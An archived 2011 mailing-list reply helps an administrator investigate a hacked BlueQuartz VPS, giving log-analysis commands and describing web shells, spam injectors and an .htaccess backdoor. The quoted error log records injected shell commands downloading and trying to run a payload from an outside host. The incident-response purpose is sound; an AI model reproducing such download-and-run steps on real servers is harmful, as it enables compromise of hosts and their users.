[BlueOnyx:08830] Re: vps hacked

Greg Kuhnert gkuhnert at compassnetworks.com.au
Thu Oct 13 15:59:52 -05 2011 

Hi Steffan.

On 13/10/2011 11:07 PM, Steffan wrote:
>
> I still have a client with a BlueQuartz server (vps)
>
> This morning the virtual server was hacked
>
> I looked in the logs and found this in /var/log/httpd/error_log
>

I've seen almost identical attacks recently. I saw someone using an old 
PHP application (an old copy of creloaded) which contained security 
vulnerabilities. This happened on a BlueOnyx server - and due to the 
openbasedir restrictions, the damage was restricted to one vsite. 
(Thankyou Michael for openbasedir integration - its one of the most 
powerful additions in blueonyx)

The bad guys installed a web based tool that allows remote users to 
browse the file system, get files etc etc. and to upload and manipulate 
other files. Their next action was to install a web based spam injection 
tool, which received spam commands via xml. Check your postmaster inbox 
for a higher than normal number of undeliverable messages - This will be 
a good indication if they've done this to you.

My suggestion to you for troubleshooting: Look at your access logs. Most 
HTTP injections are controlled by POST requests in your web log.

grep POST /var/log/httpd/access_log | cut -d " " -f 1,8 | cut -d "?" -f 
1| sort | uniq -c | sort -nr | less

This command will produce a sorted list of URL's where POST commands are 
used on your server sorted by frequency of use. Look for items that are 
unfamiliar to you - particularly those that are getting a lot of hits.

Another hint one specific to your situation

ls -l `locate .htaccess`

Look at the dates of the .htaccess files - One or more of them will have 
a recent date stamp ... View the file, and you will find where the error 
documents are pointing to an external URL. Some older versions of apache 
pull this error document externally, and execute the php code on your 
system. (Not sure if this is still a problem on Bluequartz - but it was 
ages ago). The bad guys use this so that if you cleanup the initial 
problem, they still have a backdoor back into your system. The bot in 
this case appears to connect back to an IRC server for remote control.

Best of luck cleaning up your server.

Greg.

> [Wed Oct 12 00:07:13 2011] [error] [client 220.181.125.72] no 
> acceptable variant: /usr/sausalito/ui/web/error/fileNotFound.html
>
> --00:07:40--  http://rapha.altervista.org/prv.txt
>
>            => `prv.txt'
>
> Resolving rapha.altervista.org... 46.4.65.68
>
> Connecting to rapha.altervista.org|46.4.65.68|:80... connected.
>
> HTTP request sent, awaiting response... 200 OK
>
> Length: 28,039 (27K) [text/plain]
>
>     0K .......... .......... .......                         100% 
> 1015.53 KB/s
>
> 00:07:40 (1015.53 KB/s) - `prv.txt' saved [28039/28039]
>
> sh: line 1: lwp-downlod: command not found
>
> sh: line 1: fetch: command not found
>
> sh: line 2: rapha.altervista.org/prv.txt: No such file or directory
>
>   % Total    % Received % Xferd  Average Speed   Time    Time     
> Time  Current
>
>                                  Dload  Upload   Total   Spent    
> Left  Speed
>
> ^M 14 28039   14  4097    0     0  98324      0 --:--:-- --:--:-- 
> --:--:-- 98324^M100 28039  100 28039    0     0   403k      0 --:--:-- 
> --:--:-- --:--:--  899k
>
> sh: line 3: prv.txt: command not found
>
> --00:07:40--  http://rapha.altervista.org/prv.txt
>
>            => `prv.txt'
>
> Resolving rapha.altervista.org... 46.4.65.68
>
> Connecting to rapha.altervista.org|46.4.65.68|:80... connected.
>
> HTTP request sent, awaiting response... 200 OK
>
> Length: 28,039 (27K) [text/plain]
>
> 0K .......... .......... .......                         100% 1020.34 KB/s
>
> 00:07:40 (1020.34 KB/s) - `prv.txt' saved [28039/28039]
>
> sh: line 1: lwp-downlod: command not found
>
> sh: line 1: fetch: command not found
>
> sh: line 2: rapha.altervista.org/prv.txt: No such file or directory
>
>   % Total    % Received % Xferd  Average Speed   Time    Time     
> Time  Current
>
>                                  Dload  Upload   Total   Spent    
> Left  Speed
>
> ^M  4 28039    4  1201    0     0  42493      0 --:--:-- --:--:-- 
> --:--:-- 42493^M100 28039  100 28039    0     0   507k      0 --:--:-- 
> --:--:-- --:--:-- 1048k
>
> sh: line 3: prv.txt: command not found
>
> I don't see any admin logins
>
> How can I find out what happened
> I dont see anything weird in the access log or message log
>
> Thanxs Steffan
>
>
>
> _______________________________________________
> Blueonyx mailing list
> Blueonyx at mail.blueonyx.it
> http://mail.blueonyx.it/mailman/listinfo/blueonyx


-- 
+---------------------------------------------------------------------+
|   / \   Greg Kuhnert,gkuhnert at compassnetworks.com.au                |
|<  o>   Compass Networks - Pointing you in the right direction      |
|   \ /   See us for BlueQuartz / BlueOnyx modules and Support.       |
+---------------------------------------------------------------------+

-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.blueonyx.it/pipermail/blueonyx/attachments/20111014/2b1e3031/attachment.html>

More information about the Blueonyx mailing list